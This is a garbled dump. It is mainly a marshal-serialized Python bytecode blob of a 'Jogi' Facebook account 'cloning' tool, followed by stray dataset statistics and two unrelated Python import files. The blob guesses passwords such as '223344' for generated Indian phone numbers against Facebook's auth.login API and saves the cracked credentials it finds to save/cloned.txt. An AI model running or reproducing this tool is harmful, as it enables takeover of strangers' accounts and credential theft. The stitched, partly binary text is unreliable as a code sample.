x00Ns\x04\x00\x00\x00. s\x04\x00\x00\x00.. s\x04\x00\x00\x00... s\x1b\x00\x00\x00\r\x1b[1;93mPlease Wait \x1b[1;93mi\x01\x00\x00\x00(\x05\x00\x00\x00R\x07\x00\x00\x00R\x1a\x00\x00\x00R\x1d\x00\x00\x00R\x1e\x00\x00\x00R\x1f\x00\x00\x00(\x02\x00\x00\x00t\x05\x00\x00\x00titikt\x01\x00\x00\x00o(\x00\x00\x00\x00(\x00\x00\x00\x00s\x0c\x00\x00\x00tahmid_rayatt\x03\x00\x00\x00tikB\x00\x00\x00s\n\x00\x00\x00\x00\x02\x0f\x01\r\x01\x08\x01\r\x01i\x00\x00\x00\x00s\r\x00\x00\x00\x1b[31mNot Vulns\t\x00\x00\x00\x1b[32mVulnt\x05\x00\x00\x00clears\x8f\x01\x00\x00\x1b[1;92m---------------------Jogi---------------------\n\n\x1b[1;94m Creater : \x1b[1;92mJogi-Maharaja\n\x1b[1;94mFacebook: \x1b[1;92mJogiMaharaja\n\x1b[1;94mYoutube : \x1b[1;92mhttps://www.youtube.com/channel/UCGEzNlT-HNPnVtAvUSJAY-A\n\x1b[1;94mIts Not A Name Its Brand \x1b[1;92mJOGI\n\x1b[1;92mNo Login Need Enjoy without any problem\n\x1b[1;92mSpeed Commands Country code\n\n\x1b[1;92m-----------------Jogi-------------------------\ns\xa4\x01\x00\x00\n\\[1;92m---------------------Jogi------------------------------------------\n\n\x1b[1;94mCreater : \x1b[1;92mJogi-Maharaja\n\x1b[1;94mFacebook: \x1b[1;92mJogiMaharaja\n\x1b[1;94mYoutube : \x1b[1;92mhttps://www.youtube.com/channel/UCGEzNlT-HNPnVtAvUSJAY-A\n\x1b[1;94mIts Not A Name Its Brand \x1b[1;92mJOGI\n\x1b[1;92mNo Login Need Enjoy without any problem\n\x1b[1;92mSpeed Commands Country code\n\n\x1b[1;96m-----------------Jogi-------------------------\ns\x90\x01\x00\x00\n\x1b[1;92m\n---------------------Jogi---------------------\n\n\x1b[1;94mCreater : \x1b[1;92mJogi-Maharaja\n\x1b[1;94mFacebook: \x1b[1;92mJogiMaharaja\n\x1b[1;94mYoutube : \x1b[1;92mhttps://www.youtube.com/channel/UCGEzNlT-HNPnVtAvUSJAY-A\n\x1b[1;94mIts Not A Name Its Brand \x1b[1;92mJOGI\n\x1b[1;92mNo Login Need Enjoy without any problem\n\x1b[1;92mSpeed Commands Country code\n\n\x1b[1;96m-----------------Jogi-------------------------\nt\x04\x00\x00\x00jogit\x04\x00\x00\x00trues$\x00\x00\x00\x1b[1;92m[?] 
\x1b[1;97mPASSWORD \x1b[1;97m: s.\x00\x00\x00\n \x1b[1;92mCORRECT\n t\x05\x00\x00\x00falses\x0c\x00\x00\x00\x1b[1;92mWRONGsA\x00\x00\x00xdg-open https://www.youtube.com/channel/UCGEzNlT-HNPnVtAvUSJAY-Ac\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00C\x00\x00\x00s\x18\x00\x00\x00t\x00\x00j\x01\x00d\x01\x00\x83\x01\x00\x01t\x02\x00\x83\x00\x00\x01d\x00\x00S(\x02\x00\x00\x00NR&\x00\x00\x00(\x03\x00\x00\x00R\x06\x00\x00\x00t\x06\x00\x00\x00systemt\x05\x00\x00\x00login(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x0c\x00\x00\x00tahmid_rayatt\x07\x00\x00\x00lisensi`\x00\x00\x00s\x04\x00\x00\x00\x00\x01\r\x01c\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00C\x00\x00\x00s4\x00\x00\x00t\x00\x00j\x01\x00d\x01\x00\x83\x01\x00\x01t\x02\x00GHd\x02\x00GHt\x03\x00j\x04\x00d\x03\x00\x83\x01\x00\x01d\x04\x00GHt\x05\x00\x83\x00\x00\x01d\x00\x00S(\x05\x00\x00\x00NR&\x00\x00\x00s+\x00\x00\x00\x1b[1;93m[1]\x1b[1;92mStart cloning ( no login )g\x9a\x99\x99\x99\x99\x99\xa9?s,\x00\x00\x00\x1b[1;93m[0]\x1b[1;92m Exit ( See You Later Bye )(\x06\x00\x00\x00R\x06\x00\x00\x00R*\x00\x00\x00t\x05\x00\x00\x00logo1R\x1e\x00\x00\x00R\x1f\x00\x00\x00t\x0b\x00\x00\x00pilih_login(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x0c\x00\x00\x00tahmid_rayatR+\x00\x00\x00e\x00\x00\x00s\x0c\x00\x00\x00\x00\x01\r\x01\x05\x01\x05\x01\r\x01\x05\x01c\x00\x00\x00\x00\x01\x00\x00\x00\x02\x00\x00\x00C\x00\x00\x00sA\x00\x00\x00t\x00\x00d\x01\x00\x83\x01\x00}\x00\x00|\x00\x00d\x02\x00k\x02\x00r\'\x00d\x03\x00GHt\x01\x00\x83\x00\x00\x01n\x16\x00|\x00\x00d\x04\x00k\x02\x00r=\x00t\x02\x00\x83\x00\x00\x01n\x00\x00d\x00\x00S(\x05\x00\x00\x00Ns\x17\x00\x00\x00\n\x1b[1;92mCHOOSE: \x1b[1;95mR\x0b\x00\x00\x00s\x18\x00\x00\x00\x1b[1;92mFill In Correctlyt\x01\x00\x00\x001(\x03\x00\x00\x00t\t\x00\x00\x00raw_inputR.\x00\x00\x00t\x04\x00\x00\x00Zeek(\x01\x00\x00\x00t\x04\x00\x00\x00peak(\x00\x00\x00\x00(\x00\x00\x00\x00s\x0c\x00\x00\x00tahmid_rayatR.\x00\x00\x00n\x00\x00\x00s\x0c\x00\x00\x00\x00\x01\x0c\x01\x0c\x01\x05\x01\n\x01\x0c\x01c\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00C\x00\x00\x00sA\x00\x00\x00t\x00\x00j\x01\x00d\x01\x00\x83\x01\x00\x01t\x02\x00GHd\x02\x00GHt\x03\x00j\x04\x00d\x03\x00\x83\x01\x00\x01d\x04\x00GHt\x03\x00j\x04\x00d\x03\x00\x83\x01\x00\x01t\x05\x00\x83\x00\x00\x01d\x00\x00S(\x05\x00\x00\x00NR&\x00\x00\x00s\x19\x00\x00\x00\x1b[1;92m[1] Start Crackingg\x9a\x99\x99\x99\x99\x99\xa9?s\x17\x00\x00\x00\x1b[1;92m[0] \x1b[1;93m 
Back(\x06\x00\x00\x00R\x06\x00\x00\x00R*\x00\x00\x00R-\x00\x00\x00R\x1e\x00\x00\x00R\x1f\x00\x00\x00t\x06\x00\x00\x00action(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x0c\x00\x00\x00tahmid_rayatR1\x00\x00\x00w\x00\x00\x00s\x0e\x00\x00\x00\x00\x01\r\x01\x05\x01\x05\x01\r\x01\x05\x01\r\x01c\x00\x00\x00\x00\x06\x00\x00\x00\x05\x00\x00\x00\x03\x00\x00\x00s\xd8\x01\x00\x00t\x00\x00d\x01\x00\x83\x01\x00}\x00\x00|\x00\x00d\x02\x00k\x02\x00r\'\x00d\x03\x00GHt\x01\x00\x83\x00\x00\x01n\xca\x00|\x00\x00d\x04\x00k\x02\x00r\xcf\x00t\x02\x00j\x03\x00d\x05\x00\x83\x01\x00\x01t\x04\x00GHd\x06\x00d\x07\x00\x17GHd\x08\x00GHyO\x00t\x00\x00d\t\x00\x83\x01\x00\x89\x00\x00d\n\x00\x89\x01\x00d\x0b\x00}\x01\x00x0\x00t\x05\x00|\x01\x00d\x0c\x00\x83\x02\x00j\x06\x00\x83\x00\x00D]\x19\x00}\x02\x00t\x07\x00j\x08\x00|\x02\x00j\t\x00\x83\x00\x00\x83\x01\x00\x01q\x84\x00WWq\xf1\x00\x04t\n\x00k\n\x00r\xcb\x00\x01\x01\x01d\r\x00GHt\x00\x00d\x0e\x00\x83\x01\x00\x01t\x0b\x00\x83\x00\x00\x01q\xf1\x00Xn"\x00|\x00\x00d\x0f\x00k\x02\x00r\xe5\x00t\x0c\x00\x83\x00\x00\x01n\x0c\x00d\x03\x00GHt\x01\x00\x83\x00\x00\x01d\x10\x00d\x11\x00\x14GHt\r\x00t\x0e\x00t\x07\x00\x83\x01\x00\x83\x01\x00}\x03\x00t\x0f\x00d\x12\x00|\x03\x00\x17\x83\x01\x00\x01t\x0f\x00d\x13\x00\x88\x00\x00\x17\x83\x01\x00\x01t\x0f\x00d\x14\x00\x83\x01\x00\x01t\x0f\x00d\x15\x00\x83\x01\x00\x01d\x10\x00d\x16\x00\x14GH\x87\x00\x00\x87\x01\x00f\x02\x00d\x17\x00\x86\x00\x00}\x04\x00t\x10\x00d\x18\x00\x83\x01\x00}\x05\x00|\x05\x00j\x11\x00|\x04\x00t\x07\x00\x83\x02\x00\x01d\x10\x00d\x16\x00\x14GHd\x19\x00GHd\x1a\x00t\r\x00t\x0e\x00t\x12\x00\x83\x01\x00\x83\x01\x00\x17d\x1b\x00\x17t\r\x00t\x0e\x00t\x13\x00\x83\x01\x00\x83\x01\x00\x17GHd\x1c\x00GHt\x0f\x00d\x1d\x00\x83\x01\x00\x01d\x02\x00GHd\x1e\x00GHt\x00\x00d\x1f\x00\x83\x01\x00\x01t\x0c\x00\x83\x00\x00\x01d\x00\x00S( \x00\x00\x00Ns\x16\x00\x00\x00\n\x1b[1;92mCHOOSE:\x1b[1;97mR\x0b\x00\x00\x00s\x15\x00\x00\x00[!] Fill In CorrectlyR/\x00\x00\x00R&\x00\x00\x00s\x1b\x00\x00\x00Enter any INDIA code Numbers\x01\x00\x00\x00\ns\x92\x00\x00\x00first three digits and the last seven digits of any phone number in this country.Write the remaining digits here.750 to 799,800 to 899,900 to 999,s\x10\x00\x00\x00\x1b[1;92mCHOOSE : s\x03\x00\x00\x00+91s\x04\x00\x00\x00.txtt\x01\x00\x00\x00rs\x12\x00\x00\x00[!] 
File Not Founds\t\x00\x00\x00\n[ Back ]t\x01\x00\x00\x000i2\x00\x00\x00s\x08\x00\x00\x00\x1b[1;92m-s\x1a\x00\x00\x00\x1b[1;92m Total ids number: s\x18\x00\x00\x00\x1b[1;92mCode you choose: s%\x00\x00\x00\x1b[1;92mWait A While Start Cracking...s#\x00\x00\x00\x1b[1;92mTo Stop Process Press Ctrl+zs\x08\x00\x00\x00\x1b[1;91m-c\x01\x00\x00\x00\x08\x00\x00\x00\x05\x00\x00\x00\x13\x00\x00\x00s\x89\x02\x00\x00|\x00\x00}\x01\x00y\x11\x00t\x00\x00j\x01\x00d\x01\x00\x83\x01\x00\x01Wn\x11\x00\x04t\x02\x00k\n\x00r*\x00\x01\x01\x01n\x01\x00XyP\x02|\x01\x00}\x02\x00t\x03\x00j\x04\x00d\x02\x00\x88\x01\x00\x17\x88\x00\x00\x17|\x01\x00\x17d\x03\x00\x17|\x02\x00\x17d\x04\x00\x17\x83\x01\x00}\x03\x00t\x05\x00j\x06\x00|\x03\x00\x83\x01\x00}\x04\x00d\x05\x00|\x04\x00k\x06\x00r\xdd\x00d\x06\x00\x88\x01\x00\x17\x88\x00\x00\x17|\x01\x00\x17d\x07\x00\x17|\x02\x00\x17GHt\x04\x00d\x08\x00d\t\x00\x83\x02\x00}\x05\x00|\x05\x00j\x07\x00\x88\x01\x00\x88\x00\x00\x17|\x01\x00\x17|\x02\x00\x17d\n\x00\x17\x83\x01\x00\x01|\x05\x00j\x08\x00\x83\x00\x00\x01t\t\x00j\n\x00\x88\x00\x00|\x01\x00\x17|\x02\x00\x17\x83\x01\x00\x01n\x9d\x01d\x0b\x00|\x04\x00d\x0c\x00\x19k\x06\x00rT\x01d\r\x00\x88\x01\x00\x17\x88\x00\x00\x17|\x01\x00\x17d\x07\x00\x17|\x02\x00\x17GHt\x04\x00d\x08\x00d\t\x00\x83\x02\x00}\x06\x00|\x06\x00j\x07\x00\x88\x01\x00\x88\x00\x00\x17|\x01\x00\x17|\x02\x00\x17d\n\x00\x17\x83\x01\x00\x01|\x06\x00j\x08\x00\x83\x00\x00\x01t\x0b\x00j\n\x00\x88\x00\x00|\x01\x00\x17|\x02\x00\x17\x83\x01\x00\x01n&\x01d\x0e\x00}\x07\x00t\x03\x00j\x04\x00d\x02\x00\x88\x01\x00\x17\x88\x00\x00\x17|\x01\x00\x17d\x03\x00\x17|\x07\x00\x17d\x04\x00\x17\x83\x01\x00}\x03\x00t\x05\x00j\x06\x00|\x03\x00\x83\x01\x00}\x04\x00d\x05\x00|\x04\x00k\x06\x00r\x03\x02d\x06\x00\x88\x01\x00\x17\x88\x00\x00\x17|\x01\x00\x17d\x07\x00\x17|\x07\x00\x17GHt\x04\x00d\x08\x00d\t\x00\x83\x02\x00}\x05\x00|\x05\x00j\x07\x00\x88\x01\x00\x88\x00\x00\x17|\x01\x00\x17|\x07\x00\x17d\n\x00\x17\x83\x01\x00\x01|\x05\x00j\x08\x00\x83\x00\x00\x01t\t\x00j\n\x00\x88\x00\x00|\x01\x00\x17|\x07\x00\x17\x83\x01\x00\x01nw\x00d\x0b\x00|\x04\x00d\x0c\x00\x19k\x06\x00rz\x02d\r\x00\x88\x01\x00\x17\x88\x00\x00\x17|\x01\x00\x17d\x07\x00\x17|\x07\x00\x17GHt\x04\x00d\x08\x00d\t\x00\x83\x02\x00}\x06\x00|\x06\x00j\x07\x00\x88\x01\x00\x88\x00\x00\x17|\x01\x00\x17|\x07\x00\x17d\n\x00\x17\x83\x01\x00\x01|\x06\x00j\x08\x00\x83\x00\x00\x01t\x0b\x00j\n\x00\x88\x00\x00|\x01\x00\x17|\x07\x00\x17\x83\x01\x00\x01n\x00\x00Wn\x07\x00\x01\x01\x01n\x01\x00Xd\x00\x00S(\x0f\x00\x00\x00Nt\x04\x00\x00\x00saves\x91\x00\x00\x00https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email=s\x17\x00\x00\x00&locale=en_US&password=sH\x00\x00\x00&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efmt\x0c\x00\x00\x00access_tokens\x15\x00\x00\x00\x1b[1;92m[Hack\xe2\x9d\xa4\xef\xb8\x8f] s\x05\x00\x00\x00 | s\x0f\x00\x00\x00save/cloned.txtR\x00\x00\x00\x00s\x01\x00\x00\x00\ns\x10\x00\x00\x00www.facebook.comt\t\x00\x00\x00error_msgs\x0f\x00\x00\x00\x1b[1;93m[CHECK] 
t\x06\x00\x00\x00223344(\x0c\x00\x00\x00R\x06\x00\x00\x00t\x05\x00\x00\x00mkdirt\x07\x00\x00\x00OSErrort\x02\x00\x00\x00brt\x04\x00\x00\x00opent\x04\x00\x00\x00jsont\x04\x00\x00\x00loadR\x1b\x00\x00\x00t\x05\x00\x00\x00closet\x03\x00\x00\x00okst\x06\x00\x00\x00appendt\x03\x00\x00\x00cpb(\x08\x00\x00\x00t\x03\x00\x00\x00argt\x04\x00\x00\x00usert\x05\x00\x00\x00pass1t\x04\x00\x00\x00datat\x01\x00\x00\x00qt\x03\x00\x00\x00okbt\x03\x00\x00\x00cpst\x05\x00\x00\x00pass2(\x02\x00\x00\x00t\x01\x00\x00\x00ct\x01\x00\x00\x00k(\x00\x00\x00\x00s\x0c\x00\x00\x00tahmid_rayatt\x04\x00\x00\x00main\xa6\x00\x00\x00sL\x00\x00\x00\x00\x01\x06\x01\x03\x01\x11\x01\r\x01\x04\x02\x03\x01\x06\x01\'\x01\x0f\x01\x0c\x01\x19\x01\x0f\x01\x1d\x01\n\x01\x18\x01\x10\x01\x19\x01\x0f\x01\x1d\x01\n\x01\x18\x02\x06\x01\'\x01\x0f\x01\x0c\x01\x19\x01\x0f\x01\x1d\x01\n\x01\x18\x01\x10\x01\x19\x01\x0f\x01\x1d\x01\n\x01\x1c\x01\x03\x01i\x1e\x00\x00\x00s\x1e\x00\x00\x00Process Has Been Completed ...s\x19\x00\x00\x00Total Hack\xe2\x9c\x93/CHECK\xe2\x9d\x97 : t\x01\x00\x00\x00/s0\x00\x00\x00Cloned Accounts Has Been Saved : save/cloned.txts:\x00\x00\x00Note : Your CHECK\xe2\x9d\x97 account Will Open after 10 to 20 dayss\x88\x03\x00\x00\n ______________________\n \xe2\x95\x91\xe2\x96\x92\xe2\x96\x92\xe2\x96\x92\xe2\x96\x92\xe2\x96\x92\xe2\x96\x92\xe2\x96\x92\xe2\x96\x92\xe2\x96\x92\xe2\x96\x92\xe2\x95\x91\n \xe2\x95\x91\xe2\x96\x92\xe2\x96\x92\xe2\x96\x92\xe2\x96\x92\xe2\x96\x92\xe2\x96\x92\xe2\x96\x92\xe2\x96\x92\xe2\x96\x92\xe2\x96\x92\xe2\x95\x91\n \xe2\x95\x91\xe2\x96\x92\xe2\x96\x92\xe2\x96\x92\xe2\x96\x92\xe2\x96\x92\xe2\x96\x92\xe2\x96\x92\xe2\x96\x92\xe2\x96\x92\xe2\x96\x92\xe2\x95\x91\n \xe2\x95\x91\xe2\x96\x92\xe2\x96\x92\xe2\x96\x92\xe2\x96\x92\xe2\x96\x92\xe2\x96\x92\xe2\x96\x92\xe2\x96\x92\xe2\x96\x92\xe2\x96\x92\xe2\x95\x91\n \xe2\x95\x91\xe2\x96\x92\xe2\x96\x92\xe2\x96\x92\xe2\x96\x92\xe2\x96\x92\xe2\x96\x92\xe2\x96\x92\xe2\x96\x92\xe2\x96\x92\xe2\x96\x92\xe2\x95\x91\n \xe2\x95\x91\xe2\x96\x92\xe2\x96\x92\xe2\x96\x92\xe2\x96\x92\xe2\x96\x92\xe2\x96\x92\xe2\x96\x92\xe2\x96\x92\xe2\x96\x92\xe2\x96\x92\xe2\x95\x91 \xe2\x95\x94\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x97 \xe2\x95\x9a\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x9d\n \xe2\x95\x91\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x95\x9a\xe2\x95\x97\n \xe2\x95\x91\xe2\x96\x88\xe2\x96\x88\xe2\x95\x94\xe2\x95\x90\xe2\x95\x90\xe2\x95\x97\xe2\x96\x88\xe2\x95\x94\xe2\x95\x90\xe2\x95\x97\xe2\x96\x88\xe2\x95\x91\n \xe2\x95\x91\xe2\x96\x88\xe2\x96\x88\xe2\x95\x91\xe2\x95\xac\xe2\x95\x94\xe2\x95\x9d\xe2\x96\x88\xe2\x95\x9a\xe2\x95\x97\xe2\x95\x91\xe2\x96\x88\xe2\x95\x91\n \xe2\x95\x91\xe2\x96\x88\xe2\x96\x88\xe2\x95\x9a\xe2\x95\x90\xe2\x95\x9d\xe2\x96\x88\xe2\x95\x91\xe2\x96\x88\xe2\x95\x9a\xe2\x95\x9d\xe2\x96\x88\xe2\x95\x91\n \xe2\x95\x9a\xe2\x95\x97\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x95\x90\xe2\x95\x9d\n \xe2\x95\x9a\xe2\x95\x97\xe2\x95\x91\xe2\x95\xa0\xe2\x95\xa9\xe2\x95\xa9\xe2\x95\xa9\xe2\x95\xa9\xe2\x95\xa9\xe2\x95\x9d\n \xe2\x95\x91\xe2\x95\x91\xe2\x94\x88\xe2\x94\x88\xe2\x94\x88\xe2\x96\x88\xe2\x96\x90\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x92.\xef\xbd\xa1oO\n 
\xe2\x95\x91\xe2\x96\x88\xe2\x96\x88\xe2\x95\xa0\xe2\x95\xa6\xe2\x95\xa6\xe2\x95\xa6\xe2\x95\x97\n \xe2\x95\x9a\xe2\x95\x97\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\n \xe2\x95\x9a\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x9d\n\n\x1b[1;96mThanks See You Later\n\x1b[1;96m My Contact\n\x1b[1;95mFb\x1b[1;92mJogiMaharaja\n\x1b[1;95myoutube\x1b[1;97mhttps://www.youtube.com/channel/UCHetqAquUkojxVvPebQpb0gs\x1c\x00\x00\x00\n\x1b[1;92m[\x1b[1;92mBack\x1b[1;95m](\x14\x00\x00\x00R0\x00\x00\x00R3\x00\x00\x00R\x06\x00\x00\x00R*\x00\x00\x00t\x05\x00\x00\x00logo2R=\x00\x00\x00t\t\x00\x00\x00readlinest\x02\x00\x00\x00idRB\x00\x00\x00t\x05\x00\x00\x00stript\x07\x00\x00\x00IOErrort\x0b\x00\x00\x00blackmafiaxR+\x00\x00\x00R\x19\x00\x00\x00R\x10\x00\x00\x00R"\x00\x00\x00R\x01\x00\x00\x00t\x03\x00\x00\x00mapRA\x00\x00\x00RC\x00\x00\x00(\x06\x00\x00\x00R2\x00\x00\x00t\x06\x00\x00\x00idlistt\x04\x00\x00\x00linet\x03\x00\x00\x00xxxRN\x00\x00\x00t\x01\x00\x00\x00p(\x00\x00\x00\x00(\x02\x00\x00\x00RL\x00\x00\x00RM\x00\x00\x00s\x0c\x00\x00\x00tahmid_rayatR3\x00\x00\x00\x81\x00\x00\x00sT\x00\x00\x00\x00\x03\x0c\x01\x0c\x01\x05\x01\n\x01\x0c\x01\r\x01\x05\x01\t\x01\x05\x01\x03\x01\x0c\x01\x06\x01\x06\x01\x1c\x01\x1b\x02\r\x01\x05\x01\n\x01\x0e\x02\x0c\x01\n\x02\x05\x01\x07\x01\t\x01\x12\x01\x0e\x01\x0e\x01\n\x01\n\x01\t\x02\x12*\x0c\x01\x10\x01\t\x01\x05\x01)\x01\x05\x01\n\x01\x05\x01\x05\x01\n\x01t\x08\x00\x00\x00__main__(\x02\x00\x00\x00s\n\x00\x00\x00User-AgentsR\x00\x00\x00Opera/9.80 (Android; Opera Mini/32.0.2254/85. U; id) Presto/2.12.423 Version/12.16(\x02\x00\x00\x00s\n\x00\x00\x00user-agents\x1e\x01\x00\x00Dalvik/1.6.0 (Linux; U; Android 4.4.2; NX55 Build/KOT5506) [FBAN/FB4A;FBAV/106.0.0.26.68;FBBV/45904160;FBDM/{density=3.0,width=1080,height=1920};FBLC/it_IT;FBRV/45904160;FBCR/PosteMobile;FBMF/asus;FBBD/asus;FBPN/com.facebook.katana;FBDV/ASUS_Z00AD;FBSV/5.0;FBOP/1;FBCA/x86:armeabi-v7a;](=\x00\x00\x00R\x06\x00\x00\x00R\x07\x00\x00\x00R\x1e\x00\x00\x00t\x08\x00\x00\x00datetimeR\x0e\x00\x00\x00t\x07\x00\x00\x00hashlibt\x02\x00\x00\x00ret\t\x00\x00\x00threadingR>\x00\x00\x00t\x06\x00\x00\x00urllibt\t\x00\x00\x00cookielibt\x07\x00\x00\x00getpassR*\x00\x00\x00t\x05\x00\x00\x00ranget\x01\x00\x00\x00nR\x0f\x00\x00\x00t\x04\x00\x00\x00nmbrR=\x00\x00\x00R\x1a\x00\x00\x00R\x1d\x00\x00\x00t\x08\x00\x00\x00requestst\x0b\x00\x00\x00ImportErrort\t\x00\x00\x00mechanizeR\x1f\x00\x00\x00t\x14\x00\x00\x00multiprocessing.poolR\x01\x00\x00\x00t\x13\x00\x00\x00requests.exceptionsR\x02\x00\x00\x00R\x03\x00\x00\x00t\x06\x00\x00\x00reloadt\x12\x00\x00\x00setdefaultencodingR<\x00\x00\x00t\x11\x00\x00\x00set_handle_robotst\x05\x00\x00\x00Falset\x12\x00\x00\x00set_handle_refresht\x05\x00\x00\x00_httpt\x14\x00\x00\x00HTTPRefreshProcessort\n\x00\x00\x00addheadersR\t\x00\x00\x00R\x16\x00\x00\x00R\x11\x00\x00\x00R"\x00\x00\x00R%\x00\x00\x00t\x04\x00\x00\x00backRA\x00\x00\x00RR\x00\x00\x00RC\x00\x00\x00t\x06\x00\x00\x00vulnott\x04\x00\x00\x00vulnR-\x00\x00\x00RP\x00\x00\x00t\x0f\x00\x00\x00CorrectPasscodet\x04\x00\x00\x00loopR0\x00\x00\x00t\x08\x00\x00\x00passcodeR,\x00\x00\x00R+\x00\x00\x00R.\x00\x00\x00R1\x00\x00\x00R3\x00\x00\x00t\x08\x00\x00\x00__name__(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x0c\x00\x00\x00tahmid_rayatt\x08\x00\x00\x00<module>\x02\x00\x00\x00st\x00\x00\x00\x90\x01\r\x01\x13\x01\x12\x01\x12\x01\x05\x01\x11\x02\x03\x01\x10\x01\r\x01\x11\x02\x03\x01\x10\x01\r\x01\r\x01\r\x01\x11\x02\x9c\x01\x10\x01\x10\x01\x10\x01\n\x01\r\x01\x0c\x01\r\x01\x1c\x01\x0c\x01\x0c\x02\t
\x05\t\t\t\x0b\t\x07\t\t\x06\x01\x06\x01\x06\x01\x06\x01\x06\x01\x06\x01\r\x01\x05\x01\x06\x01\x06\x01\x06\x01\x06\x01\x0f\x01\x0c\x01\x0c\x01\x05\x01\t\x02\x05\x01\x11\x02\t\x05\t\t\t\t\t\n\t\\\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x0c\x00\x00\x00tahmid_rayatt\x08\x00\x00\x00<module>\x05\x00\x00\x00s\x02\x00\x00\x00\x0c\x01'))
| 8,186
| 24,542
| 0.749002
| 5,381
| 24,558
| 3.406244
| 0.106857
| 0.235037
| 0.115882
| 0.080528
| 0.655737
| 0.589612
| 0.507284
| 0.459545
| 0.423318
| 0.394621
| 0
| 0.378423
| 0.01413
| 24,558
| 3
| 24,542
| 8,186
| 0.37863
| 0
| 0
| 0
| 0
| 2.5
| 0.533757
| 0.467872
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0.5
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 0
| 0
|
0
| 11
|
8291ddc028f1d54d7bc24e7c70835f4edb38515f
| 186
|
py
|
Python
|
whatlies/transformers/__init__.py
|
louisguitton/whatlies
|
a6cfa8a08555fbd8a9cee950e36a2cd59a2eb7c0
|
[
"Apache-2.0"
] | null | null | null |
whatlies/transformers/__init__.py
|
louisguitton/whatlies
|
a6cfa8a08555fbd8a9cee950e36a2cd59a2eb7c0
|
[
"Apache-2.0"
] | null | null | null |
whatlies/transformers/__init__.py
|
louisguitton/whatlies
|
a6cfa8a08555fbd8a9cee950e36a2cd59a2eb7c0
|
[
"Apache-2.0"
] | null | null | null |
from whatlies.transformers.pca import Pca
from whatlies.transformers.umap import Umap
from whatlies.transformers.noise import Noise
from whatlies.transformers.addrandom import AddRandom
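A minimal usage sketch for the record above (added for illustration, not part of the original file): how these transformer classes are typically applied to a whatlies EmbeddingSet. The SpacyLanguage backend, the spaCy model name, and the choice of two components are assumptions.
from whatlies.language import SpacyLanguage
from whatlies.transformers import Pca, Umap

lang = SpacyLanguage("en_core_web_sm")        # assumes this spaCy model is installed
emb = lang[["cat", "dog", "king", "queen"]]   # build a small EmbeddingSet
emb_pca = emb.transform(Pca(2))               # linear projection to 2 components
emb_umap = emb.transform(Umap(2))             # non-linear projection to 2 components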
| 37.2
| 53
| 0.870968
| 24
| 186
| 6.75
| 0.333333
| 0.296296
| 0.592593
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.086022
| 186
| 4
| 54
| 46.5
| 0.952941
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
82a9d80d4be624c40bb0b4e5ee8fb60babdbd5e9
| 216
|
py
|
Python
|
autosense/neural/__init__.py
|
jay1999ke/autoSense
|
b3027c5a7c1f2fb5a67decdf3e3f8a751313ace8
|
[
"MIT"
] | null | null | null |
autosense/neural/__init__.py
|
jay1999ke/autoSense
|
b3027c5a7c1f2fb5a67decdf3e3f8a751313ace8
|
[
"MIT"
] | null | null | null |
autosense/neural/__init__.py
|
jay1999ke/autoSense
|
b3027c5a7c1f2fb5a67decdf3e3f8a751313ace8
|
[
"MIT"
] | null | null | null |
import autosense.neural.loss as Loss
from autosense.neural.param import Weight, Initializer
from autosense.neural.layers import Linear, Conv2D, Dropout, Linear2
from autosense.neural.optim import Optimizer, optimNode
| 54
| 68
| 0.847222
| 29
| 216
| 6.310345
| 0.586207
| 0.327869
| 0.311475
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.010204
| 0.092593
| 216
| 4
| 69
| 54
| 0.923469
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
